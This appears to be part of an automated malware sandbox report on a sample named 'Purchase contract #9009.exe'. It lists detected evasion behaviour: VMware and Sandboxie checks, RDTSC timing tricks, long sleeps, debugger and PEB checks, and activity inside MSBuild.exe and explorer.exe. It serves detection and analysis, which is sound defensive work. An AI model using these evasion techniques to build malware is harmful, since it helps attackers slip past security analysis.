Source: Yara match File source: Process Memory Space: Purchase contract #9009.exe PID: 6948, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe RDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe RDTSC instruction interceptor: First address: 0000000002EA85E4 second address: 0000000002EA85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe RDTSC instruction interceptor: First address: 0000000002EA897E second address: 0000000002EA8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_004088B0 rdtsc 4_2_004088B0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Purchase contract #9009.exe TID: 6952 Thread sleep time: -41114s >= -30000s
Source: C:\Users\user\Desktop\Purchase contract #9009.exe TID: 4696 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 4044 Thread sleep time: -40000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 7056 Thread sleep time: -36000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Thread delayed: delay time: 41114
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000005.00000000.687420389.000000000FCE0000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.676988098.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000005.00000000.681816397.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmp Binary or memory string: vmware
Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000005.00000000.678706314.0000000006650000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.681816397.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.681847888.000000000A64D000.00000004.00000001.sdmp Binary or memory string: _VMware_SATA_CD00#5&
Source: explorer.exe, 00000005.00000000.681965378.000000000A716000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATAa
Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.674285838.0000000004710000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
Source: explorer.exe, 00000005.00000000.676988098.00000000058C0000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.681965378.000000000A716000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
Source: explorer.exe, 00000005.00000000.676988098.00000000058C0000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: explorer.exe, 00000005.00000000.682069588.000000000A784000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
Source: Purchase contract #9009.exe, 00000001.00000002.667717817.0000000002951000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000005.00000000.676988098.00000000058C0000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\Purchase contract #9009.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\explorer.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_004088B0 rdtsc 4_2_004088B0
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_00409B20 LdrLoadDll, 4_2_00409B20
Contains functionality to read the PEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015CB944 mov eax, dword ptr fs:[00000030h] 4_2_015CB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015CB944 mov eax, dword ptr fs:[00000030h] 4_2_015CB944
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015AB171 mov eax, dword ptr fs:[00000030h] 4_2_015AB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015AB171 mov eax, dword ptr fs:[00000030h] 4_2_015AB171
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015AC962 mov eax, dword ptr fs:[00000030h] 4_2_015AC962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A9100 mov eax, dword ptr fs:[00000030h] 4_2_015A9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A9100 mov eax, dword ptr fs:[00000030h] 4_2_015A9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A9100 mov eax, dword ptr fs:[00000030h] 4_2_015A9100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D513A mov eax, dword ptr fs:[00000030h] 4_2_015D513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D513A mov eax, dword ptr fs:[00000030h] 4_2_015D513A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015C4120 mov eax, dword ptr fs:[00000030h] 4_2_015C4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015C4120 mov eax, dword ptr fs:[00000030h] 4_2_015C4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015C4120 mov eax, dword ptr fs:[00000030h] 4_2_015C4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015C4120 mov eax, dword ptr fs:[00000030h] 4_2_015C4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015C4120 mov ecx, dword ptr fs:[00000030h] 4_2_015C4120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_016341E8 mov eax, dword ptr fs:[00000030h] 4_2_016341E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015AB1E1 mov eax, dword ptr fs:[00000030h] 4_2_015AB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015AB1E1 mov eax, dword ptr fs:[00000030h] 4_2_015AB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015AB1E1 mov eax, dword ptr fs:[00000030h] 4_2_015AB1E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_016649A4 mov eax, dword ptr fs:[00000030h] 4_2_016649A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_016649A4 mov eax, dword ptr fs:[00000030h] 4_2_016649A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_016649A4 mov eax, dword ptr fs:[00000030h] 4_2_016649A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_016649A4 mov eax, dword ptr fs:[00000030h] 4_2_016649A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_016269A6 mov eax, dword ptr fs:[00000030h] 4_2_016269A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D2990 mov eax, dword ptr fs:[00000030h] 4_2_015D2990
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015DA185 mov eax, dword ptr fs:[00000030h] 4_2_015DA185
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_016251BE mov eax, dword ptr fs:[00000030h] 4_2_016251BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_016251BE mov eax, dword ptr fs:[00000030h] 4_2_016251BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_016251BE mov eax, dword ptr fs:[00000030h] 4_2_016251BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_016251BE mov eax, dword ptr fs:[00000030h] 4_2_016251BE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015CC182 mov eax, dword ptr fs:[00000030h] 4_2_015CC182
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D61A0 mov eax, dword ptr fs:[00000030h] 4_2_015D61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D61A0 mov eax, dword ptr fs:[00000030h] 4_2_015D61A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015C0050 mov eax, dword ptr fs:[00000030h] 4_2_015C0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015C0050 mov eax, dword ptr fs:[00000030h] 4_2_015C0050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01671074 mov eax, dword ptr fs:[00000030h] 4_2_01671074
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01662073 mov eax, dword ptr fs:[00000030h] 4_2_01662073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D002D mov eax, dword ptr fs:[00000030h] 4_2_015D002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D002D mov eax, dword ptr fs:[00000030h] 4_2_015D002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D002D mov eax, dword ptr fs:[00000030h] 4_2_015D002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D002D mov eax, dword ptr fs:[00000030h] 4_2_015D002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D002D mov eax, dword ptr fs:[00000030h] 4_2_015D002D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015BB02A mov eax, dword ptr fs:[00000030h] 4_2_015BB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015BB02A mov eax, dword ptr fs:[00000030h] 4_2_015BB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015BB02A mov eax, dword ptr fs:[00000030h] 4_2_015BB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015BB02A mov eax, dword ptr fs:[00000030h] 4_2_015BB02A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01674015 mov eax, dword ptr fs:[00000030h] 4_2_01674015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01674015 mov eax, dword ptr fs:[00000030h] 4_2_01674015
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01627016 mov eax, dword ptr fs:[00000030h] 4_2_01627016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01627016 mov eax, dword ptr fs:[00000030h] 4_2_01627016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01627016 mov eax, dword ptr fs:[00000030h] 4_2_01627016
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0163B8D0 mov eax, dword ptr fs:[00000030h] 4_2_0163B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0163B8D0 mov ecx, dword ptr fs:[00000030h] 4_2_0163B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0163B8D0 mov eax, dword ptr fs:[00000030h] 4_2_0163B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0163B8D0 mov eax, dword ptr fs:[00000030h] 4_2_0163B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0163B8D0 mov eax, dword ptr fs:[00000030h] 4_2_0163B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0163B8D0 mov eax, dword ptr fs:[00000030h] 4_2_0163B8D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A58EC mov eax, dword ptr fs:[00000030h] 4_2_015A58EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A40E1 mov eax, dword ptr fs:[00000030h] 4_2_015A40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A40E1 mov eax, dword ptr fs:[00000030h] 4_2_015A40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A40E1 mov eax, dword ptr fs:[00000030h] 4_2_015A40E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A9080 mov eax, dword ptr fs:[00000030h] 4_2_015A9080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015DF0BF mov ecx, dword ptr fs:[00000030h] 4_2_015DF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015DF0BF mov eax, dword ptr fs:[00000030h] 4_2_015DF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015DF0BF mov eax, dword ptr fs:[00000030h] 4_2_015DF0BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01623884 mov eax, dword ptr fs:[00000030h] 4_2_01623884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01623884 mov eax, dword ptr fs:[00000030h] 4_2_01623884
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E90AF mov eax, dword ptr fs:[00000030h] 4_2_015E90AF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D20A0 mov eax, dword ptr fs:[00000030h] 4_2_015D20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D20A0 mov eax, dword ptr fs:[00000030h] 4_2_015D20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D20A0 mov eax, dword ptr fs:[00000030h] 4_2_015D20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D20A0 mov eax, dword ptr fs:[00000030h] 4_2_015D20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D20A0 mov eax, dword ptr fs:[00000030h] 4_2_015D20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D20A0 mov eax, dword ptr fs:[00000030h] 4_2_015D20A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015AF358 mov eax, dword ptr fs:[00000030h] 4_2_015AF358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015ADB40 mov eax, dword ptr fs:[00000030h] 4_2_015ADB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D3B7A mov eax, dword ptr fs:[00000030h] 4_2_015D3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D3B7A mov eax, dword ptr fs:[00000030h] 4_2_015D3B7A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015ADB60 mov ecx, dword ptr fs:[00000030h] 4_2_015ADB60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01678B58 mov eax, dword ptr fs:[00000030h] 4_2_01678B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0166131B mov eax, dword ptr fs:[00000030h] 4_2_0166131B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_016253CA mov eax, dword ptr fs:[00000030h] 4_2_016253CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_016253CA mov eax, dword ptr fs:[00000030h] 4_2_016253CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015CDBE9 mov eax, dword ptr fs:[00000030h] 4_2_015CDBE9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D03E2 mov eax, dword ptr fs:[00000030h] 4_2_015D03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D03E2 mov eax, dword ptr fs:[00000030h] 4_2_015D03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D03E2 mov eax, dword ptr fs:[00000030h] 4_2_015D03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D03E2 mov eax, dword ptr fs:[00000030h] 4_2_015D03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D03E2 mov eax, dword ptr fs:[00000030h] 4_2_015D03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D03E2 mov eax, dword ptr fs:[00000030h] 4_2_015D03E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01675BA5 mov eax, dword ptr fs:[00000030h] 4_2_01675BA5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D2397 mov eax, dword ptr fs:[00000030h] 4_2_015D2397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015DB390 mov eax, dword ptr fs:[00000030h] 4_2_015DB390
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B1B8F mov eax, dword ptr fs:[00000030h] 4_2_015B1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B1B8F mov eax, dword ptr fs:[00000030h] 4_2_015B1B8F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0165D380 mov ecx, dword ptr fs:[00000030h] 4_2_0165D380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0166138A mov eax, dword ptr fs:[00000030h] 4_2_0166138A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D4BAD mov eax, dword ptr fs:[00000030h] 4_2_015D4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D4BAD mov eax, dword ptr fs:[00000030h] 4_2_015D4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015D4BAD mov eax, dword ptr fs:[00000030h] 4_2_015D4BAD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0165B260 mov eax, dword ptr fs:[00000030h] 4_2_0165B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0165B260 mov eax, dword ptr fs:[00000030h] 4_2_0165B260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01678A62 mov eax, dword ptr fs:[00000030h] 4_2_01678A62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A9240 mov eax, dword ptr fs:[00000030h] 4_2_015A9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A9240 mov eax, dword ptr fs:[00000030h] 4_2_015A9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A9240 mov eax, dword ptr fs:[00000030h] 4_2_015A9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A9240 mov eax, dword ptr fs:[00000030h] 4_2_015A9240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E927A mov eax, dword ptr fs:[00000030h] 4_2_015E927A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0166EA55 mov eax, dword ptr fs:[00000030h] 4_2_0166EA55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_01634257 mov eax, dword ptr fs:[00000030h] 4_2_01634257
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015C3A1C mov eax, dword ptr fs:[00000030h] 4_2_015C3A1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A5210 mov eax, dword ptr fs:[00000030h] 4_2_015A5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A5210 mov ecx, dword ptr fs:[00000030h] 4_2_015A5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A5210 mov eax, dword ptr fs:[00000030h] 4_2_015A5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015A5210 mov eax, dword ptr fs:[00000030h] 4_2_015A5210
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015AAA16 mov eax, dword ptr fs:[00000030h] 4_2_015AAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015AAA16 mov eax, dword ptr fs:[00000030h] 4_2_015AAA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015B8A0A mov eax, dword ptr fs:[00000030h] 4_2_015B8A0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0166AA16 mov eax, dword ptr fs:[00000030h] 4_2_0166AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_0166AA16 mov eax, dword ptr fs:[00000030h] 4_2_0166AA16
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E4A2C mov eax, dword ptr fs:[00000030h] 4_2_015E4A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015E4A2C mov eax, dword ptr fs:[00000030h] 4_2_015E4A2C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h] 4_2_015CA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h] 4_2_015CA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h] 4_2_015CA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h] 4_2_015CA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h] 4_2_015CA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h] 4_2_015CA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h] 4_2_015CA229
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 4_2_015CA229 mov eax, dword ptr fs:[00000030h] 4_2_015CA229
